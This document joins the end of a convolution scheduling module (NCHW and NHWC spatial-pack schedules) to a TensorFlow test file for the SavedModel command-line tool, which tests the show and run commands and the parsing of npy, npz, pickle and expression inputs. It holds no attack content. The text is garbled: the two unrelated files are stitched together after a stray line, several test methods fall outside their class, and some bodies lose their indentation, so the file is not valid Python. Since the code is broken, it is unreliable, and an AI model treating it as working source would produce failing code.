        scheduled_ops.append(op)

    traverse(outs[0].op)
    return s
def _schedule_spatial_conv2d_nchw(s, data, data_q, data_pad, data_vec,
                                  kernel, kernel_q, kernel_vec,
                                  conv_out, output, last):
    """Apply the NCHW spatial-pack schedule: vectorize the inner channel
    tile, parallelize data/kernel packing and the output stage.

    Stride and padding are re-inferred from tensor shapes because they are
    not carried on the ops themselves.
    """
    IB, _, CI, IH, IW = data_q.shape
    KB, CO, _, KH, KW = kernel_q.shape
    _, _, OH, OW = output.shape

    # Infer padding and stride
    if data_pad is None:
        padding = (0, 0)
        TH, TW = IH, IW
    else:
        _, _, _, TH, TW = data_pad.shape
        hpad = get_const_int((TH - IH) // 2)
        wpad = get_const_int((TW - IW) // 2)
        padding = (hpad, wpad)

    hstride = get_const_int((TH - KH) // (OH - 1))
    wstride = get_const_int((TW - KW) // (OW - 1))
    stride = (hstride, wstride)

    wkl = _get_workload(data, kernel, stride, padding, output.dtype, "NCHW")
    sch = _get_schedule(wkl, "NCHW")
    # tiling/parallelization factors from the schedule table
    VH = sch.vh
    VW = sch.vw
    VC = sch.vc
    ba = sch.ba
    bc = sch.bc

    CC = s.cache_write(conv_out, "global")

    n, co, oh, ow, vh, vw, vc = s[conv_out].op.axis
    s[conv_out].vectorize(vc)

    s[CC].compute_at(s[conv_out], ow)
    n, co, oh, ow, vh, vw, vc = s[CC].op.axis
    ci, dh, dw, b1, b2 = s[CC].op.reduce_axis
    s[CC].reorder(ci, dh, vh, dw, vw, b1, b2, vc)
    s[CC].unroll(b1)
    s[CC].unroll(b2)
    s[CC].vectorize(vc)

    ##### Schedule A (data packing)
    if data_pad is not None:
        s[data_pad].compute_inline()

    _, h, _, _, _, _, vw = s[data_vec].op.axis
    s[data_vec].vectorize(vw)
    if ba == 1:
        oaxis = h
        paxis = h
    else:
        oh, ih = s[data_vec].split(h, ba)
        oaxis = oh
        paxis = ih
    s[data_vec].parallel(paxis)
    s[data_vec].pragma(oaxis, "parallel_launch_point")
    s[data_vec].pragma(paxis, "parallel_stride_pattern")
    s[data_vec].pragma(oaxis, "parallel_barrier_when_finish")

    ##### Schedule B (kernel packing)
    co, _, _, _, _, vc = s[kernel_vec].op.axis
    s[kernel_vec].vectorize(vc)
    if bc == 1:
        oaxis = co
        paxis = co
    else:
        oco, ico = s[kernel_vec].split(co, bc)
        oaxis = oco
        paxis = ico
    s[kernel_vec].parallel(paxis)
    s[kernel_vec].pragma(oaxis, "parallel_launch_point")
    s[kernel_vec].pragma(paxis, "parallel_stride_pattern")
    s[kernel_vec].pragma(oaxis, "parallel_barrier_when_finish")

    ##### Schedule C (output stage)
    n, co, h, w = s[last].op.axis
    co, vc = s[last].split(co, VC)
    oh, ow, vh, vw = s[last].tile(h, w, VH, VW)
    s[last].reorder(n, co, oh, ow, vh, vw, vc)
    if last != output:
        s[output].compute_inline()
        s[conv_out].compute_at(s[last], ow)

    if bc == 1:
        oaxis = co
        paxis = co
    else:
        oco, ico = s[last].split(co, bc)
        oaxis = oco
        paxis = ico

    s[last].parallel(paxis)
    s[last].pragma(oaxis, "parallel_launch_point")
    s[last].pragma(paxis, "parallel_stride_pattern")
    s[last].pragma(oaxis, "parallel_barrier_when_finish")
    return s
def _schedule_spatial_conv2d_nhwc(s, data, data_q, data_pad, data_vec,
                                  kernel, kernel_q, kernel_vec,
                                  conv_out, output, last):
    """Apply the NHWC spatial-pack schedule (mirror of the NCHW variant
    with NHWC axis order)."""
    # no stride and padding info here
    _, IH, IW, CI, IB = data_q.shape
    KH, KW, _, CO, KB = kernel_q.shape
    _, OH, OW, _ = output.shape

    # Infer padding and stride
    if data_pad is None:
        padding = (0, 0)
        TH, TW = IH, IW
    else:
        _, TH, TW, _, _ = data_pad.shape
        hpad = get_const_int((TH - IH) // 2)
        wpad = get_const_int((TW - IW) // 2)
        padding = (hpad, wpad)

    hstride = get_const_int((TH - KH) // (OH - 1))
    wstride = get_const_int((TW - KW) // (OW - 1))
    stride = (hstride, wstride)

    wkl = _get_workload(data, kernel, stride, padding, last.dtype, "NHWC")
    sch = _get_schedule(wkl, "NHWC")
    # tiling/parallelization factors from the schedule table
    VH = sch.vh
    VW = sch.vw
    VC = sch.vc
    ba = sch.ba
    bc = sch.bc

    ##### Schedule data packing
    if data_pad is not None:
        s[data_pad].compute_inline()

    _, h, _, _, _, _, _ = s[data_vec].op.axis
    if ba == 1:
        oaxis = h
        paxis = h
    else:
        oh, ih = s[data_vec].split(h, ba)
        oaxis = oh
        paxis = ih
    s[data_vec].parallel(paxis)
    s[data_vec].pragma(oaxis, "parallel_launch_point")
    s[data_vec].pragma(paxis, "parallel_stride_pattern")
    s[data_vec].pragma(oaxis, "parallel_barrier_when_finish")

    ##### Schedule kernel packing
    co, _, _, _, _, _ = s[kernel_vec].op.axis
    if bc == 1:
        oaxis = co
        paxis = co
    else:
        oco, ico = s[kernel_vec].split(co, bc)
        oaxis = oco
        paxis = ico
    s[kernel_vec].parallel(paxis)
    s[kernel_vec].pragma(oaxis, "parallel_launch_point")
    s[kernel_vec].pragma(paxis, "parallel_stride_pattern")
    s[kernel_vec].pragma(oaxis, "parallel_barrier_when_finish")

    ##### Schedule Convolution
    n, oh, ow, co, vh, vw, vc = s[conv_out].op.axis
    dh, dw, ci, b1, b2 = s[conv_out].op.reduce_axis

    s[conv_out].reorder(n, oh, ow, co, vh, vw, dh, dw, ci, vc, b1, b2)
    s[conv_out].unroll(b1)
    s[conv_out].unroll(b2)
    s[conv_out].vectorize(vc)

    # # Schedule output
    n, h, w, co = s[last].op.axis
    co, vc = s[last].split(co, VC)
    oh, ow, vh, vw = s[last].tile(h, w, VH, VW)
    s[last].reorder(n, oh, ow, co, vh, vw, vc)
    s[last].vectorize(vc)
    if last != output:
        s[output].compute_inline()
        s[conv_out].compute_at(s[last], ow)

    if bc == 1:
        oaxis = oh
        paxis = oh
    else:
        oho, iho = s[last].split(oh, bc)
        oaxis = oho
        paxis = iho

    s[last].parallel(paxis)
    s[last].pragma(oaxis, "parallel_launch_point")
    s[last].pragma(paxis, "parallel_stride_pattern")
    s[last].pragma(oaxis, "parallel_barrier_when_finish")
    return s
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SavedModelCLI tool."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import pickle
import platform
import shutil
import sys
from absl.testing import parameterized
import numpy as np
from six import StringIO
from tensorflow.core.example import example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import save
from tensorflow.python.tools import saved_model_cli
from tensorflow.python.training.tracking import tracking
SAVED_MODEL_PATH = ('cc/saved_model/testdata/half_plus_two/00000123')
@contextlib.contextmanager
def captured_output():
    """Temporarily redirect stdout/stderr, yielding the capture buffers."""
    saved_streams = sys.stdout, sys.stderr
    fake_out, fake_err = StringIO(), StringIO()
    try:
        sys.stdout, sys.stderr = fake_out, fake_err
        yield sys.stdout, sys.stderr
    finally:
        sys.stdout, sys.stderr = saved_streams
class SavedModelCLITestCase(test.TestCase, parameterized.TestCase):
    def setUp(self):
        """Skip every test in this class on Windows, where they fail."""
        super(SavedModelCLITestCase, self).setUp()
        if platform.system() == 'Windows':
            self.skipTest('Skipping failing tests on Windows.')
    def testShowCommandAll(self):
        """`show --dir <model> --all` dumps every SignatureDef verbatim."""
        base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
        self.parser = saved_model_cli.create_parser()
        args = self.parser.parse_args(['show', '--dir', base_path, '--all'])
        with captured_output() as (out, err):
            saved_model_cli.show(args)
        output = out.getvalue().strip()
        # pylint: disable=line-too-long
        # NOTE(review): the expected literal below appears to have lost its
        # leading indentation in this copy of the file -- verify against the
        # CLI's actual output before relying on it.
        exp_out = """MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['classify_x2_to_y3']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: x2:0
The given SavedModel SignatureDef contains the following output(s):
outputs['scores'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y3:0
Method name is: tensorflow/serving/classify
signature_def['classify_x_to_y']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_STRING
shape: unknown_rank
name: tf_example:0
The given SavedModel SignatureDef contains the following output(s):
outputs['scores'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y:0
Method name is: tensorflow/serving/classify
signature_def['regress_x2_to_y3']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: x2:0
The given SavedModel SignatureDef contains the following output(s):
outputs['outputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y3:0
Method name is: tensorflow/serving/regress
signature_def['regress_x_to_y']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_STRING
shape: unknown_rank
name: tf_example:0
The given SavedModel SignatureDef contains the following output(s):
outputs['outputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y:0
Method name is: tensorflow/serving/regress
signature_def['regress_x_to_y2']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_STRING
shape: unknown_rank
name: tf_example:0
The given SavedModel SignatureDef contains the following output(s):
outputs['outputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y2:0
Method name is: tensorflow/serving/regress
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['x'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: x:0
The given SavedModel SignatureDef contains the following output(s):
outputs['y'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y:0
Method name is: tensorflow/serving/predict"""
        # pylint: enable=line-too-long
        self.maxDiff = None  # Produce a useful error msg if the comparison fails
        self.assertMultiLineEqual(output, exp_out)
        self.assertEqual(err.getvalue().strip(), '')
    def testShowAllWithFunctions(self):
        """`show --all` also lists saved tf.functions and their call options."""

        class DummyModel(tracking.AutoTrackable):
            """Model with callable polymorphic functions specified."""

            @def_function.function
            def func1(self, a, b, c):
                if c:
                    return a + b
                else:
                    return a * b

            @def_function.function(input_signature=[
                tensor_spec.TensorSpec(shape=(2, 2), dtype=dtypes.float32)
            ])
            def func2(self, x):
                return x + 2

            @def_function.function
            def __call__(self, y, c=7):
                return y + 2 * c

        saved_model_dir = os.path.join(test.get_temp_dir(), 'dummy_model')
        dummy_model = DummyModel()
        # Call with specific values to create new polymorphic function traces.
        dummy_model.func1(constant_op.constant(5), constant_op.constant(9), True)
        dummy_model(constant_op.constant(5))
        save.save(dummy_model, saved_model_dir)
        self.parser = saved_model_cli.create_parser()
        args = self.parser.parse_args(['show', '--dir', saved_model_dir, '--all'])
        with captured_output() as (out, err):
            saved_model_cli.show(args)
        output = out.getvalue().strip()
        # NOTE(review): the expected literal below appears to have lost its
        # leading indentation in this copy of the file -- verify before use.
        exp_out = """MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['__saved_model_init_op']:
The given SavedModel SignatureDef contains the following input(s):
The given SavedModel SignatureDef contains the following output(s):
outputs['__saved_model_init_op'] tensor_info:
dtype: DT_INVALID
shape: unknown_rank
name: NoOp
Method name is:
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['x'] tensor_info:
dtype: DT_FLOAT
shape: (2, 2)
name: serving_default_x:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output_0'] tensor_info:
dtype: DT_FLOAT
shape: (2, 2)
name: PartitionedCall:0
Method name is: tensorflow/serving/predict
Defined Functions:
Function Name: '__call__'
Option #1
Callable with:
Argument #1
y: TensorSpec(shape=(), dtype=tf.int32, name='y')
Argument #2
DType: int
Value: 7
Function Name: 'func1'
Option #1
Callable with:
Argument #1
a: TensorSpec(shape=(), dtype=tf.int32, name='a')
Argument #2
b: TensorSpec(shape=(), dtype=tf.int32, name='b')
Argument #3
DType: bool
Value: True
Function Name: 'func2'
Option #1
Callable with:
Argument #1
x: TensorSpec(shape=(2, 2), dtype=tf.float32, name='x')
""".strip()  # pylint: enable=line-too-long
        self.maxDiff = None  # Produce a useful error msg if the comparison fails
        self.assertMultiLineEqual(output, exp_out)
        self.assertEqual(err.getvalue().strip(), '')
    def testShowAllWithPureConcreteFunction(self):
        """`show --all` lists a directly-saved ConcreteFunction as callable."""

        class DummyModel(tracking.AutoTrackable):
            """Model with a callable concrete function."""

            def __init__(self):
                function = def_function.function(
                    self.multiply,
                    input_signature=[
                        tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
                        tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32)
                    ])
                self.pure_concrete_function = function.get_concrete_function()
                super(DummyModel, self).__init__()

            def multiply(self, a, b):
                return a * b

        saved_model_dir = os.path.join(test.get_temp_dir(), 'dummy_model')
        dummy_model = DummyModel()
        save.save(dummy_model, saved_model_dir)
        self.parser = saved_model_cli.create_parser()
        args = self.parser.parse_args(['show', '--dir', saved_model_dir, '--all'])
        with captured_output() as (out, err):
            saved_model_cli.show(args)
        output = out.getvalue().strip()
        # NOTE(review): the expected literal below appears to have lost its
        # leading indentation in this copy of the file -- verify before use.
        exp_out = """MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['__saved_model_init_op']:
The given SavedModel SignatureDef contains the following input(s):
The given SavedModel SignatureDef contains the following output(s):
outputs['__saved_model_init_op'] tensor_info:
dtype: DT_INVALID
shape: unknown_rank
name: NoOp
Method name is:
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['a'] tensor_info:
dtype: DT_FLOAT
shape: ()
name: serving_default_a:0
inputs['b'] tensor_info:
dtype: DT_FLOAT
shape: ()
name: serving_default_b:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output_0'] tensor_info:
dtype: DT_FLOAT
shape: ()
name: PartitionedCall:0
Method name is: tensorflow/serving/predict
Defined Functions:
Function Name: 'pure_concrete_function'
Option #1
Callable with:
Argument #1
a: TensorSpec(shape=(), dtype=tf.float32, name='a')
Argument #2
b: TensorSpec(shape=(), dtype=tf.float32, name='b')
""".strip()  # pylint: enable=line-too-long
        self.maxDiff = None  # Produce a useful error msg if the comparison fails
        self.assertMultiLineEqual(output, exp_out)
        self.assertEqual(err.getvalue().strip(), '')
def testShowCommandTags(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(['show', '--dir', base_path])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
exp_out = 'The given SavedModel contains the following tag-sets:\n\'serve\''
self.assertMultiLineEqual(output, exp_out)
self.assertEqual(err.getvalue().strip(), '')
def testShowCommandSignature(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(
['show', '--dir', base_path, '--tag_set', 'serve'])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
exp_header = ('The given SavedModel MetaGraphDef contains SignatureDefs '
'with the following keys:')
exp_start = 'SignatureDef key: '
exp_keys = [
'"classify_x2_to_y3"', '"classify_x_to_y"', '"regress_x2_to_y3"',
'"regress_x_to_y"', '"regress_x_to_y2"', '"serving_default"'
]
# Order of signatures does not matter
self.assertMultiLineEqual(
output,
'\n'.join([exp_header] + [exp_start + exp_key for exp_key in exp_keys]))
self.assertEqual(err.getvalue().strip(), '')
def testShowCommandErrorNoTagSet(self):
  """`show` with a tag-set that is not in the model raises RuntimeError."""
  model_dir = test.test_src_dir_path(SAVED_MODEL_PATH)
  self.parser = saved_model_cli.create_parser()
  args = self.parser.parse_args(
      ['show', '--dir', model_dir, '--tag_set', 'badtagset'])
  with self.assertRaises(RuntimeError):
    saved_model_cli.show(args)
def testShowCommandInputsOutputs(self):
  """`show --signature_def` prints the signature's tensors and method name.

  The expected output is compared verbatim, including its indentation.
  """
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  self.parser = saved_model_cli.create_parser()
  args = self.parser.parse_args([
      'show', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'serving_default'
  ])
  with captured_output() as (out, err):
    saved_model_cli.show(args)
  output = out.getvalue().strip()
  expected_output = (
      'The given SavedModel SignatureDef contains the following input(s):\n'
      '  inputs[\'x\'] tensor_info:\n'
      '      dtype: DT_FLOAT\n      shape: (-1, 1)\n      name: x:0\n'
      'The given SavedModel SignatureDef contains the following output(s):\n'
      '  outputs[\'y\'] tensor_info:\n'
      '      dtype: DT_FLOAT\n      shape: (-1, 1)\n      name: y:0\n'
      'Method name is: tensorflow/serving/predict')
  self.assertEqual(output, expected_output)
  # Nothing should be written to stderr on the success path.
  self.assertEqual(err.getvalue().strip(), '')
def testPrintREFTypeTensor(self):
  """_print_tensor_info renders reference dtypes such as DT_FLOAT_REF."""
  tensor_info = meta_graph_pb2.TensorInfo()
  tensor_info.dtype = types_pb2.DT_FLOAT_REF
  with captured_output() as (out, err):
    saved_model_cli._print_tensor_info(tensor_info)
  self.assertIn('DT_FLOAT_REF', out.getvalue().strip())
  self.assertEqual(err.getvalue().strip(), '')
def testInputPreProcessFormats(self):
  """The --inputs / --input_exprs argument strings are split correctly.

  File inputs parse into ``(filename, optional variable name)`` tuples;
  expression inputs are evaluated to their Python/numpy values.
  """
  input_str = 'input1=/path/file.txt[ab3];input2=file2'
  input_expr_str = 'input3=np.zeros([2,2]);input4=[4,5]'
  input_dict = saved_model_cli.preprocess_inputs_arg_string(input_str)
  input_expr_dict = saved_model_cli.preprocess_input_exprs_arg_string(
      input_expr_str)
  # Use assertEqual (not assertTrue(a == b)) so a failure shows both values;
  # the stray debug print() that used to be here is removed.
  self.assertEqual(input_dict['input1'], ('/path/file.txt', 'ab3'))
  self.assertEqual(input_dict['input2'], ('file2', None))
  self.assertAllClose(input_expr_dict['input3'], np.zeros([2, 2]))
  self.assertAllClose(input_expr_dict['input4'], [4, 5])
  self.assertLen(input_dict, 2)
  self.assertLen(input_expr_dict, 2)
def testInputPreProcessExamplesWithStrAndBytes(self):
  """--input_examples serializes feature dicts into tf.Example protos.

  Both Python str and bytes feature values end up as bytes_list entries.
  """
  input_examples_str = 'inputs=[{"text":["foo"], "bytes":[b"bar"]}]'
  input_dict = saved_model_cli.preprocess_input_examples_arg_string(
      input_examples_str)
  # The parsed value is a list of serialized Example protos.
  feature = example_pb2.Example.FromString(input_dict['inputs'][0])
  # assertProtoEquals parses the text proto, so formatting is not significant.
  self.assertProtoEquals(
      """
      features {
        feature {
          key: "bytes"
          value {
            bytes_list {
              value: "bar"
            }
          }
        }
        feature {
          key: "text"
          value {
            bytes_list {
              value: "foo"
            }
          }
        }
      }
      """, feature)
def testInputPreProcessFileNames(self):
  """Windows-style paths (drive letters, spaces, ':') survive parsing."""
  input_str = (r'inputx=C:\Program Files\data.npz[v:0];'
               r'input:0=c:\PROGRA~1\data.npy')
  parsed = saved_model_cli.preprocess_inputs_arg_string(input_str)
  self.assertEqual(parsed['inputx'], (r'C:\Program Files\data.npz', 'v:0'))
  self.assertEqual(parsed['input:0'], (r'c:\PROGRA~1\data.npy', None))
def testInputPreProcessErrorBadFormat(self):
  """Malformed --inputs / --input_exprs strings raise RuntimeError."""
  for bad_input in ('inputx=file[[v1]v2', 'inputx:file'):
    with self.assertRaises(RuntimeError):
      saved_model_cli.preprocess_inputs_arg_string(bad_input)
  with self.assertRaises(RuntimeError):
    saved_model_cli.preprocess_input_exprs_arg_string('inputx:np.zeros((5))')
def testInputParserNPY(self):
  """.npy file inputs load as numpy arrays; a '[name]' suffix is ignored."""
  arr0 = np.array([[1], [2]])
  arr1 = np.array(range(6)).reshape(2, 3)
  path0 = os.path.join(test.get_temp_dir(), 'input0.npy')
  path1 = os.path.join(test.get_temp_dir(), 'input1.npy')
  np.save(path0, arr0)
  np.save(path1, arr1)
  input_str = 'x0=%s[x0];x1=%s' % (path0, path1)
  feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
      input_str, '', '')
  self.assertTrue(np.all(feed_dict['x0'] == arr0))
  self.assertTrue(np.all(feed_dict['x1'] == arr1))
def testInputParserNPZ(self):
  """.npz inputs: '[key]' selects an array; without it the sole array is used."""
  arr = np.array([[1], [2]])
  npz_path = os.path.join(test.get_temp_dir(), 'input.npz')
  np.savez(npz_path, a=arr)
  feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
      'x=%s[a];y=%s' % (npz_path, npz_path), '', '')
  self.assertTrue(np.all(feed_dict['x'] == arr))
  self.assertTrue(np.all(feed_dict['y'] == arr))
def testInputParserPickle(self):
  """Pickle inputs: '[key]' indexes a pickled dict; non-dicts are used whole."""
  objects = {
      'pickle0.pkl': {'a': 5, 'b': np.array(range(4))},
      'pickle1.pkl': np.array([1]),
      'pickle2.pkl': np.array([[1], [3]]),
  }
  paths = {}
  for name, obj in objects.items():
    paths[name] = os.path.join(test.get_temp_dir(), name)
    with open(paths[name], 'wb') as f:
      pickle.dump(obj, f)
  input_str = 'x=%s[b];y=%s[c];z=%s' % (
      paths['pickle0.pkl'], paths['pickle1.pkl'], paths['pickle2.pkl'])
  feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
      input_str, '', '')
  # '[b]' picks an entry of the pickled dict; for the non-dict pickles the
  # key ('[c]', or none) is irrelevant and the whole object is fed.
  self.assertTrue(np.all(feed_dict['x'] == objects['pickle0.pkl']['b']))
  self.assertTrue(np.all(feed_dict['y'] == objects['pickle1.pkl']))
  self.assertTrue(np.all(feed_dict['z'] == objects['pickle2.pkl']))
def testInputParserPythonExpression(self):
  """--input_exprs values are evaluated as Python/numpy expressions."""
  expected = {
      'x1': np.ones([2, 10]),
      'x2': np.array([[1], [2], [3]]),
      'x3': np.mgrid[0:5, 0:5],
      'x4': [[3], [4]],
  }
  input_expr_str = ('x1=np.ones([2,10]);x2=np.array([[1],[2],[3]]);'
                    'x3=np.mgrid[0:5,0:5];x4=[[3],[4]]')
  feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
      '', input_expr_str, '')
  for name, value in expected.items():
    self.assertTrue(np.all(feed_dict[name] == value))
def testInputParserBoth(self):
  """File inputs and expression inputs can be combined in one call."""
  arr = np.array([[1], [2]])
  npz_path = os.path.join(test.get_temp_dir(), 'input.npz')
  np.savez(npz_path, a=arr)
  feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
      'x0=' + npz_path + '[a]', 'x1=np.ones([2,10])', '')
  self.assertTrue(np.all(feed_dict['x0'] == arr))
  self.assertTrue(np.all(feed_dict['x1'] == np.ones([2, 10])))
def testInputParserBothDuplicate(self):
  """When a name is given via both --inputs and --input_exprs, the
  expression value wins."""
  x0 = np.array([[1], [2]])
  input_path = os.path.join(test.get_temp_dir(), 'input.npz')
  np.savez(input_path, a=x0)
  x1 = np.ones([2, 10])
  input_str = 'x0=' + input_path + '[a]'
  input_expr_str = 'x0=np.ones([2,10])'
  feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
      input_str, input_expr_str, '')
  # The expression value (x1) overrides the file-based value (x0).
  self.assertTrue(np.all(feed_dict['x0'] == x1))
def testInputParserErrorNoName(self):
  """An .npz with several arrays requires an explicit '[name]' selector."""
  npz_path = os.path.join(test.get_temp_dir(), 'input.npz')
  np.savez(npz_path, a=np.array([[1], [2]]), b=np.array(range(5)))
  with self.assertRaises(RuntimeError):
    saved_model_cli.load_inputs_from_input_arg_string('x=' + npz_path, '', '')
def testInputParserErrorWrongName(self):
  """Selecting a key that is not present in the .npz raises RuntimeError."""
  npz_path = os.path.join(test.get_temp_dir(), 'input.npz')
  np.savez(npz_path, a=np.array([[1], [2]]), b=np.array(range(5)))
  with self.assertRaises(RuntimeError):
    saved_model_cli.load_inputs_from_input_arg_string(
        'x=' + npz_path + '[c]', '', '')
def testRunCommandInputExamples(self):
  """`run --input_examples` feeds serialized tf.Examples and saves outputs."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'regress_x_to_y', '--input_examples',
      'inputs=[{"x":[8.0],"x2":[5.0]}, {"x":[4.0],"x2":[3.0]}]', '--outdir',
      output_dir
  ])
  saved_model_cli.run(args)
  # Outputs are written as <output_name>.npy under --outdir.
  y_actual = np.load(os.path.join(output_dir, 'outputs.npy'))
  # Expected values are determined by the checked-in test model.
  y_expected = np.array([[6.0], [4.0]])
  self.assertAllEqual(y_expected, y_actual)
def testRunCommandExistingOutdir(self):
  """`run` writes outputs.npy into an already-existing --outdir."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  x = np.array([[1], [2]])
  x_notused = np.zeros((6, 3))  # extra array in the .npz that is never fed
  input_path = os.path.join(test.get_temp_dir(), 'testRunCommand_inputs.npz')
  np.savez(input_path, x0=x, x1=x_notused)
  output_file = os.path.join(test.get_temp_dir(), 'outputs.npy')
  # Remove any stale output from a previous run: without --overwrite,
  # `run` raises if the output file already exists.
  if os.path.exists(output_file):
    os.remove(output_file)
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'regress_x2_to_y3', '--inputs', 'inputs=' + input_path + '[x0]',
      '--outdir',
      test.get_temp_dir()
  ])
  saved_model_cli.run(args)
  y_actual = np.load(output_file)
  # Expected values are determined by the checked-in test model.
  y_expected = np.array([[3.5], [4.0]])
  self.assertAllClose(y_expected, y_actual)
def testRunCommandNewOutdir(self):
  """`run --outdir` creates a missing directory and writes <output>.npy."""
  self.parser = saved_model_cli.create_parser()
  model_dir = test.test_src_dir_path(SAVED_MODEL_PATH)
  x = np.array([[1], [2]])
  inputs_path = os.path.join(test.get_temp_dir(),
                             'testRunCommandNewOutdir_inputs.npz')
  out_dir = os.path.join(test.get_temp_dir(), 'new_dir')
  # Make sure the output directory really does not exist yet.
  if os.path.isdir(out_dir):
    shutil.rmtree(out_dir)
  np.savez(inputs_path, x0=x, x1=np.zeros((6, 3)))
  args = self.parser.parse_args([
      'run', '--dir', model_dir, '--tag_set', 'serve', '--signature_def',
      'serving_default', '--inputs', 'x=' + inputs_path + '[x0]', '--outdir',
      out_dir
  ])
  saved_model_cli.run(args)
  self.assertAllClose(
      np.array([[2.5], [3.0]]), np.load(os.path.join(out_dir, 'y.npy')))
def testRunCommandOutOverwrite(self):
  """`run --overwrite` replaces an existing output file instead of failing."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  x = np.array([[1], [2]])
  x_notused = np.zeros((6, 3))
  input_path = os.path.join(test.get_temp_dir(),
                            'testRunCommandOutOverwrite_inputs.npz')
  np.savez(input_path, x0=x, x1=x_notused)
  output_file = os.path.join(test.get_temp_dir(), 'y.npy')
  # Pre-create an (empty) output file to exercise the overwrite path.
  open(output_file, 'a').close()
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
      test.get_temp_dir(), '--overwrite'
  ])
  saved_model_cli.run(args)
  y_actual = np.load(output_file)
  # Expected values are determined by the checked-in test model.
  y_expected = np.array([[2.5], [3.0]])
  self.assertAllClose(y_expected, y_actual)
def testRunCommandInvalidInputKeyError(self):
  """Feeding an input key the signature does not declare raises ValueError."""
  self.parser = saved_model_cli.create_parser()
  model_dir = test.test_src_dir_path(SAVED_MODEL_PATH)
  run_args = self.parser.parse_args([
      'run', '--dir', model_dir, '--tag_set', 'serve', '--signature_def',
      'regress_x2_to_y3', '--input_exprs', 'x2=np.ones((3,1))'
  ])
  with self.assertRaises(ValueError):
    saved_model_cli.run(run_args)
def testRunCommandInvalidSignature(self):
  """An unknown --signature_def key produces a descriptive ValueError."""
  self.parser = saved_model_cli.create_parser()
  model_dir = test.test_src_dir_path(SAVED_MODEL_PATH)
  run_args = self.parser.parse_args([
      'run', '--dir', model_dir, '--tag_set', 'serve', '--signature_def',
      'INVALID_SIGNATURE', '--input_exprs', 'x2=np.ones((3,1))'
  ])
  with self.assertRaisesRegex(ValueError,
                              'Could not find signature "INVALID_SIGNATURE"'):
    saved_model_cli.run(run_args)
def testRunCommandInputExamplesNotListError(self):
  """--input_examples must be a list of example dicts, not a bare dict."""
  self.parser = saved_model_cli.create_parser()
  base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
  output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
  args = self.parser.parse_args([
      'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
      'regress_x_to_y', '--input_examples', 'inputs={"x":8.0,"x2":5.0}',
      '--outdir', output_dir
  ])
  with self.assertRaisesRegex(ValueError, 'must be a list'):
    saved_model_cli.run(args)
